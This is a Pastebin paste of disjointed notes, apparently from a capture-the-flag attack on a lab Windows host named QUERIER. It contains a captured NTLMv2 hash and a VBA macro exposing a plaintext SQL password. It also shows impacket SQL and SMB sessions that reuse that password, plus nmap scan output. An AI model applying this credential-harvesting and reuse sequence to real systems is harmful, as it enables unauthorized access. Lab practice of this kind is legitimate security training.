API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Mar 8th, 2019
1,701
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 28.43 KB | None | 0 0
raw download clone embed print report
  1. SMBv2] NTLMv2-SSP Client : 10.10.10.125
  2. [SMBv2] NTLMv2-SSP Username : QUERIER\mssql-svc
  3. [SMBv2] NTLMv2-SSP Hash : mssql-svc::QUERIER: ae754b1a0fe95a89:C039575BA1E072A174F31FF02EE97D2A:0101000000000000C0653150DE09D201EC228EA337C04BF5000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D20106000400020000000800300030000000000000000000000000300000DB98BCBFA45B3495D0C7E864FECB6C41E252875882C6804D8CDB6E89F52EA1390A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310035002E00320030003700000000000000000000000000
  4. [*] Skipping previously captured hash for QUERIER\mssql-svc
  5. [SMBv2] NTLMv2-SSP Client : 10.10.10.125
  6. [SMBv2] NTLMv2-SSP Username : \gX
  7. [SMBv2] NTLMv2-SSP Hash : gX:::ee481ad063676eb2::
  8. [*] Skipping previously captured hash for \gX
  9.  
  10. ]]]
  11.  
  12.  
  13.  
  14. .SQL> select * from sysusers
  15. uid status name sid roles createdate updatedate altuid password gid environ hasdbaccess islogin isntname isntgroup isntuser issqluser isaliased issqlrole isapprole
  16. ----------- ----------- -------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------- ---------- ----------- --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------- --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------- ----------- ----------- ----------- ----------- ----------- ----------- ----------- -----------
  17. 0 0 public 01050000000000090400000083741b006749c04ba943c02702f2a762 NULL 2003-04-08 09:10:42 2009-04-13 12:59:14 1 NULL 0 NULL 0 0 0 0 0 0 0 1 0
  18. 1 12 dbo 010500000000000515000000e5cfd9d970fd97dacb23a5d1f4010000 NULL 2003-04-08 09:10:42 2019-01-29 00:09:44 NULL NULL 0 NULL 1 1 1 0 1 0 0 0 0
  19. 2 0 guest 00 NULL 2003-04-08 09:10:42 2003-04-08 09:10:42 NULL NULL 0 NULL 0 1 0 0 0 1 0 0 0
  20. 3 0 INFORMATION_SCHEMA NULL NULL 2009-04-13 12:59:11 2009-04-13 12:59:11 NULL NULL 0 NULL 0 1 0 0 0 1 0 0 0
  21. 4 0 sys NULL NULL 2009-04-13 12:59:11 2009-04-13 12:59:11 NULL NULL 0 NULL 0 1 0 0 0 1 0 0 0
  22. 5 12 reporting 010500000000000515000000e5cfd9d970fd97dacb23a5d1ea030000 NULL 2019-01-29 00:10:15 2019-01-29 00:10:15 NULL NULL 0 NULL 1 1 1 0 1 0 0 0 0
  23. 16384 0 db_owner 01050000000000090400000000000000000000000000000000400000 NULL 2003-04-08 09:10:42 2009-04-13 12:59:14 1 NULL 16384 NULL 0 0 0 0 0 0 0 1 0
  24. 16385 0 db_accessadmin 01050000000000090400000000000000000000000000000001400000 NULL 2003-04-08 09:10:42 2009-04-13 12:59:14 1 NULL 16385 NULL 0 0 0 0 0 0 0 1 0
  25. 16386 0 db_securityadmin 01050000000000090400000000000000000000000000000002400000 NULL 2003-04-08 09:10:42 2009-04-13 12:59:14 1 NULL 16386 NULL 0 0 0 0 0 0 0 1 0
  26. 16387 0 db_ddladmin 01050000000000090400000000000000000000000000000003400000 NULL 2003-04-08 09:10:42 2009-04-13 12:59:14 1 NULL 16387 NULL 0 0 0 0 0 0 0 1 0
  27. 16389 0 db_backupoperator 01050000000000090400000000000000000000000000000005400000 NULL 2003-04-08 09:10:42 2009-04-13 12:59:14 1 NULL 16389 NULL 0 0 0 0 0 0 0 1 0
  28. 16390 0 db_datareader 01050000000000090400000000000000000000000000000006400000 NULL 2003-04-08 09:10:42 2009-04-13 12:59:14 1 NULL 16390 NULL 0 0 0 0 0 0 0 1 0
  29. 16391 0 db_datawriter 01050000000000090400000000000000000000000000000007400000 NULL 2003-04-08 09:10:42 2009-04-13 12:59:14 1 NULL 16391 NULL 0 0 0 0 0 0 0 1 0
  30. 16392 0 db_denydatareader 01050000000000090400000000000000000000000000000008400000 NULL 2003-04-08 09:10:42 2009-04-13 12:59:14 1 NULL 16392 NULL 0 0 0 0 0 0 0 1 0
  31. 16393 0 db_denydatawriter 01050000000000090400000000000000000000000000000009400000 NULL 2003-04-08 09:10:42 2009-04-13 12:59:14 1 NULL 16393 NULL 0 0 0 0 0 0 0 1 0
  32. SQL> Traceback (most recent call last):
  33. File "./mssqlclient.py", line 188, in <module>
  34. shell.cmdloop()
  35. File "/usr/lib/python2.7/cmd.py", line 130, in cmdloop
  36. line = raw_input(self.prompt)
  37.  
  38.  
  39. /mssqlclient.py -windows-auth QUERIER.local/reporting@10.10.10.125
  40.  
  41. ./mssqlclient.py -windows-auth QUERIER.local/reporting@10.10.10.125
  42.  
  43.  
  44.  
  45. qq@z:~/Downloads/impacket/examples$ ./mssqlclient.py -windows-auth QUERIER.local/reporting:PcwTWTHRwryjc$c6@10.10.10.125
  46.  
  47. ./mssqlclient.py -windows-auth QUERIER.local/reporting@10.10.10.125
  48.  
  49. PcwTWTHRwryjc$c6
  50.  
  51. qq@z:~/Downloads/impacket/examples$ ./smbclient.py 10.10.10.125
  52. Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation
  53.  
  54. Type help for list of commands
  55. # login reporting
  56. Password:
  57. [*] USER Session Granted
  58. # use C$
  59. [-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
  60. # shares
  61. ADMIN$
  62. C$
  63. IPC$
  64. Reports
  65. # use ADMIN$
  66. [-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
  67. # use C$
  68. [-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
  69. # use IPC$
  70. # ls
  71. -rw-rw-rw- 3 Mon Jan 1 11:55:44 1601 InitShutdown
  72. -rw-rw-rw- 5 Mon Jan 1 11:55:44 1601 lsass
  73. -rw-rw-rw- 3 Mon Jan 1 11:55:44 1601 ntsvcs
  74. -rw-rw-rw- 3 Mon Jan 1 11:55:44 1601 scerpc
  75. -rw-rw-rw- 1 Mon Jan 1 11:55:44 1601 Winsock2\CatalogChangeListener-324-0
  76. -rw-rw-rw- 3 Mon Jan 1 11:55:44 1601 epmapper
  77. -rw-rw-rw- 1 Mon Jan 1 11:55:44 1601 Winsock2\CatalogChangeListener-1c8-0
  78. -rw-rw-rw- 3 Mon Jan 1 11:55:44 1601 LSM_API_service
  79. -rw-rw-rw- 3 Mon Jan 1 11:55:44 1601 eventlog
  80. -rw-rw-rw- 1 Mon Jan 1 11:55:44 1601 Winsock2\CatalogChangeListener-3dc-0
  81. -rw-rw-rw- 3 Mon Jan 1 11:55:44 1601 atsvc
  82. -rw-rw-rw- 1 Mon Jan 1 11:55:44 1601 Winsock2\CatalogChangeListener-3b4-0
  83. -rw-rw-rw- 5 Mon Jan 1 11:55:44 1601 wkssvc
  84. -rw-rw-rw- 1 Mon Jan 1 11:55:44 1601 Winsock2\CatalogChangeListener-258-0
  85. -rw-rw-rw- 3 Mon Jan 1 11:55:44 1601 spoolss
  86. -rw-rw-rw- 1 Mon Jan 1 11:55:44 1601 Winsock2\CatalogChangeListener-5c0-0
  87. -rw-rw-rw- 3 Mon Jan 1 11:55:44 1601 winreg
  88. -rw-rw-rw- 3 Mon Jan 1 11:55:44 1601 trkwks
  89. -rw-rw-rw- 4 Mon Jan 1 11:55:44 1601 srvsvc
  90. -rw-rw-rw- 1 Mon Jan 1 11:55:44 1601 vgauth-service
  91. -rw-rw-rw- 1 Mon Jan 1 11:55:44 1601 Winsock2\CatalogChangeListener-634-0
  92. -rw-rw-rw- 3 Mon Jan 1 11:55:44 1601 ROUTER
  93. -rw-rw-rw- 3 Mon Jan 1 11:55:44 1601 W32TIME_ALT
  94. -rw-rw-rw- 7 Mon Jan 1 11:55:44 1601 SQLLocal\MSSQLSERVER
  95. -rw-rw-rw- 2 Mon Jan 1 11:55:44 1601 sql\query
  96. -rw-rw-rw- 1 Mon Jan 1 11:55:44 1601 Winsock2\CatalogChangeListener-250-0
  97. -rw-rw-rw- 1 Mon Jan 1 11:55:44 1601 PSHost.131965566707989647.3216.DefaultAppDomain.powershell
  98. -rw-rw-rw- 1 Mon Jan 1 11:55:44 1601 PSHost.131965567825779064.964.DefaultAppDomain.powershell
  99. #
  100.  
  101.  
  102.  
  103.  
  104.  
  105.  
  106.  
  107.  
  108.  
  109.  
  110.  
  111.  
  112.  
  113.  
  114.  
  115.  
  116.  
  117.  
  118.  
  119.  
  120.  
  121.  
  122.  
  123.  
  124. qq@z:~/Downloads/impacket$ python ./mssqlclient.py QUERIER/reporting:PcwTWTHRwryjc$c6@10.10.10.125
  125. Impacket v0.9.19-dev - Copyright 2019 SecureAuth Corporation
  126.  
  127. [*] Encryption required, switching to TLS
  128. [-] ERROR(QUERIER): Line 1: Login failed for user 'reporting'.
  129. qq@z:~/Downloads/impacket$
  130.  
  131. Line 105: User does not have permission to perform this action
  132.  
  133. Can get into 10.10.10.25/IPC$ with any account:
  134. gives error:
  135. NT_STATUS_INVALID_INFO_CLASS listing \*
  136.  
  137. =
  138.  
  139. ERRbadpipe
  140.  
  141. STATUS_INVALID_INFO_CLASS
  142. Invalid named pipe.
  143.  
  144.  
  145. Potential SQL account:
  146. Uid=reporting;
  147. Pwd=PcwTWTHRwryjc$c6
  148. Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6
  149.  
  150.  
  151.  
  152. Rem Attribute VBA_ModuleType=VBADocumentModule
  153. Option VBASupport 1
  154.  
  155. ' macro to pull data for client volume reports
  156. '
  157. ' further testing required
  158.  
  159. Private Sub Connect()
  160.  
  161. Dim conn As ADODB.Connection
  162. Dim rs As ADODB.Recordset
  163.  
  164. Set conn = New ADODB.Connection
  165. conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
  166. conn.ConnectionTimeout = 10
  167. conn.Open
  168.  
  169. If conn.State = adStateOpen Then
  170.  
  171. ' MsgBox "connection successful"
  172.  
  173. 'Set rs = conn.Execute("SELECT * @@version;")
  174. Set rs = conn.Execute("SELECT * FROM volume;")
  175. Sheets(1).Range("A1").CopyFromRecordset rs
  176. rs.Close
  177.  
  178. End If
  179.  
  180. End Sub
  181.  
  182.  
  183.  
  184. qq@z:/$ smbclient //10.10.10.125/Reports -I
  185. Enter WORKGROUP\qq's password:
  186. Try "help" to get a list of possible commands.
  187. smb: \>
  188.  
  189.  
  190.  
  191.  
  192.  
  193. qq@z:/$ smbclient -L 10.10.10.125
  194. Enter WORKGROUP\qq's password:
  195.  
  196. Sharename Type Comment
  197. --------- ---- -------
  198. ADMIN$ Disk Remote Admin
  199. C$ Disk Default share
  200. IPC$ IPC Remote IPC
  201. Reports Disk
  202. Reconnecting with SMB1 for workgroup listing.
  203. Connection to 10.10.10.125 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
  204. Failed to connect with SMB1 -- no workgroup available
  205. qq@z:/$
  206.  
  207.  
  208.  
  209. Windows SMB: 139/445
  210.  
  211. PORT STATE SERVICE VERSION
  212. 135/tcp open msrpc Microsoft Windows RPC
  213. 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
  214. 445/tcp open microsoft-ds?
  215. 593/tcp filtered http-rpc-epmap
  216. 1433/tcp open ms-sql-s Microsoft SQL Server vNext tech preview 14.00.1000
  217. 1521/tcp filtered oracle
  218. 1718/tcp filtered h323gatedisc
  219. 5999/tcp filtered ncd-conf
  220. 6779/tcp filtered unknown
  221. 10024/tcp filtered unknown
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!